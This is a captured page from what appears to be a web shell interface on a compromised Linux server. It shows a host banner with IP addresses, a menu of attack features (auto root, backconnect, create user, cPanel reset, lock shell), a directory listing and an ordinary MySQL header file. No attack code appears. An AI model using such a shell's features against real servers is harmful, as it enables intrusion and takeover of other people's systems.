Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.142.53.151
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxr-xr-x
big_endian.h
3.96
KB
-rw-r--r--
binary_log_types.h
2.59
KB
-rw-r--r--
byte_order_generic.h
2.89
KB
-rw-r--r--
byte_order_generic_x86.h
2.81
KB
-rw-r--r--
decimal.h
5.45
KB
-rw-r--r--
errmsg.h
4.73
KB
-rw-r--r--
keycache.h
7.71
KB
-rw-r--r--
little_endian.h
3.82
KB
-rw-r--r--
m_ctype.h
33.87
KB
-rw-r--r--
m_string.h
10.89
KB
-rw-r--r--
my_alloc.h
2.92
KB
-rw-r--r--
my_byteorder.h
6.03
KB
-rw-r--r--
my_command.h
2.27
KB
-rw-r--r--
my_compiler.h
5.68
KB
-rw-r--r--
my_config.h
919
B
-rw-r--r--
my_config_x86_64.h
12.17
KB
-rw-r--r--
my_dbug.h
9.75
KB
-rw-r--r--
my_dir.h
3.33
KB
-rw-r--r--
my_getopt.h
6.7
KB
-rw-r--r--
my_global.h
22.75
KB
-rw-r--r--
my_list.h
2.14
KB
-rw-r--r--
my_sys.h
39.14
KB
-rw-r--r--
my_thread.h
5.16
KB
-rw-r--r--
my_thread_local.h
2.9
KB
-rw-r--r--
my_xml.h
3.15
KB
-rw-r--r--
mysql.h
29.19
KB
-rw-r--r--
mysql_com.h
24.99
KB
-rw-r--r--
mysql_com_server.h
1.85
KB
-rw-r--r--
mysql_embed.h
1.51
KB
-rw-r--r--
mysql_time.h
2.77
KB
-rw-r--r--
mysql_version.h
1023
B
-rw-r--r--
mysqld_ername.h
122.67
KB
-rw-r--r--
mysqld_error.h
44.6
KB
-rw-r--r--
mysqlx_ername.h
3.63
KB
-rw-r--r--
mysqlx_error.h
3.11
KB
-rw-r--r--
mysqlx_version.h
1.77
KB
-rw-r--r--
plugin.h
26.08
KB
-rw-r--r--
plugin_audit.h
17.52
KB
-rw-r--r--
plugin_ftparser.h
7.86
KB
-rw-r--r--
plugin_group_replication.h
5.93
KB
-rw-r--r--
plugin_keyring.h
6.54
KB
-rw-r--r--
plugin_validate_password.h
1.94
KB
-rw-r--r--
sql_common.h
8
KB
-rw-r--r--
sql_state.h
14.72
KB
-rw-r--r--
sslopt-case.h
2.43
KB
-rw-r--r--
sslopt-longopts.h
3.13
KB
-rw-r--r--
sslopt-vars.h
3.23
KB
-rw-r--r--
thr_cond.h
5.42
KB
-rw-r--r--
thr_mutex.h
5.92
KB
-rw-r--r--
thr_rwlock.h
6.28
KB
-rw-r--r--
typelib.h
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : my_command.h
/* Copyright (c) 2015, 2023, Oracle and/or its affiliates. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2.0, as published by the Free Software Foundation. This program is also distributed with certain software (including but not limited to OpenSSL) that is licensed under separate terms, as designated in a particular file or component or in included license documentation. The authors of MySQL hereby grant you an additional permission to link the program and your derivative works with the separately licensed software that they have included with MySQL. Without limiting anything contained in the foregoing, this file, which is part of C Driver for MySQL (Connector/C), is also subject to the Universal FOSS Exception, version 1.0, a copy of which can be found at http://oss.oracle.com/licenses/universal-foss-exception. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License, version 2.0, for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #ifndef _mysql_command_h #define _mysql_command_h /** @enum enum_server_command @brief You should add new commands to the end of this list, otherwise old servers won't be able to handle them as 'unsupported'. */ enum enum_server_command { COM_SLEEP, COM_QUIT, COM_INIT_DB, COM_QUERY, COM_FIELD_LIST, COM_CREATE_DB, COM_DROP_DB, COM_REFRESH, COM_SHUTDOWN, COM_STATISTICS, COM_PROCESS_INFO, COM_CONNECT, COM_PROCESS_KILL, COM_DEBUG, COM_PING, COM_TIME, COM_DELAYED_INSERT, COM_CHANGE_USER, COM_BINLOG_DUMP, COM_TABLE_DUMP, COM_CONNECT_OUT, COM_REGISTER_SLAVE, COM_STMT_PREPARE, COM_STMT_EXECUTE, COM_STMT_SEND_LONG_DATA, COM_STMT_CLOSE, COM_STMT_RESET, COM_SET_OPTION, COM_STMT_FETCH, COM_DAEMON, COM_BINLOG_DUMP_GTID, COM_RESET_CONNECTION, /* don't forget to update const char *command_name[] in sql_parse.cc */ /* Must be last */ COM_END }; #endif /* _mysql_command_h */
Close